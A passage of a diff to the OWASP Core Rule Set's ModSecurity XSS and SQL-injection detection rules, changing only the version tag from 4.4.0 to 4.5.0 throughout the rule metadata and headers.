-435,7 +435,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -454,7 +454,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -473,7 +473,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|REQU tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -492,7 +492,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -511,12 +511,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:941014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \ "id:941101,\ phase:1,\ @@ -533,7 +533,7 @@ SecRule REQUEST_FILENAME|REQUEST_HEADERS:Referer "@detectXSS" \ tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -553,7 +553,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -573,7 +573,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -593,7 +593,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -614,7 +614,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ tag:'PCI/6.5.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -635,7 +635,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'PCI/6.5.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -656,7 +656,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU tag:'OWASP_CRS',\ tag:'capec/1000/152/242',\ tag:'PCI/6.5.1',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -675,12 +675,12 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/2',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/242/63',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:941016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:941018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" SecMarker "END-REQUEST-941-APPLICATION-ATTACK-XSS" diff --git a/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf b/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf index 7b1cc5c..5ae39f7 100644 --- a/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf +++ b/rules/@owasp_crs/REQUEST-942-APPLICATION-ATTACK-SQLI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -7,8 +7,8 @@ # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:942012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@detectSQLi" \ "id:942100,\ phase:2,\ @@ -25,7 +25,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ @@ -46,7 +46,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -85,7 +85,7 @@ SecRule REQUEST_BASENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -105,7 +105,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -125,7 +125,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -145,7 +145,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -165,7 +165,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -185,7 +185,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -205,7 +205,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -225,7 +225,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -245,7 +245,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -265,7 +265,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -285,7 +285,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -305,7 +305,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -325,7 +325,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -345,7 +345,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ @@ -366,7 +366,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -385,7 +385,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -404,12 +404,12 @@ SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIE tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:942014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-REQUEST-942-APPLICATION-ATTACK-SQLI" SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=>]|<(?:<|=>?|>(?:[\s\x0b]+binary)?)|\b(?:(?:xor|r(?:egexp|like)|i(?:snull|like)|notnull)\b|collate(?:[^0-9A-Z_a-z]*?(?:U&)?[\"'`]|[^0-9A-Z_a-z]+(?:(?:binary|nocase|rtrim)\b|[0-9A-Z_a-z]*?_))|(?:likel(?:ihood|y)|unlikely)[\s\x0b]*\()|r(?:egexp|like)[\s\x0b]+binary|not[\s\x0b]+between[\s\x0b]+(?:0[\s\x0b]+and|(?:'[^']*'|\"[^\"]*\")[\s\x0b]+and[\s\x0b]+(?:'[^']*'|\"[^\"]*\"))|is[\s\x0b]+null|like[\s\x0b]+(?:null|[0-9A-Z_a-z]+[\s\x0b]+escape\b)|(?:^|[^0-9A-Z_a-z])in[\s\x0b\+]*\([\s\x0b\"0-9]+[^\(\)]*\)|[!<->]{1,2}[\s\x0b]*all\b" \ "id:942120,\ phase:2,\ @@ -426,7 +426,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=>]|<(?:<| tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -446,7 +446,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.942130_matched_var_name=%{matched_var_name}',\ chain" @@ -470,7 +470,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\x0b\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\ tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.942131_matched_var_name=%{matched_var_name}',\ @@ -495,7 +495,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -515,7 +515,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -535,7 +535,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -555,7 +555,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -575,7 +575,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -595,7 +595,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -615,7 +615,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -635,7 +635,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -655,7 +655,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -675,7 +675,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/66',\ tag:'PCI/6.5.2',\ - 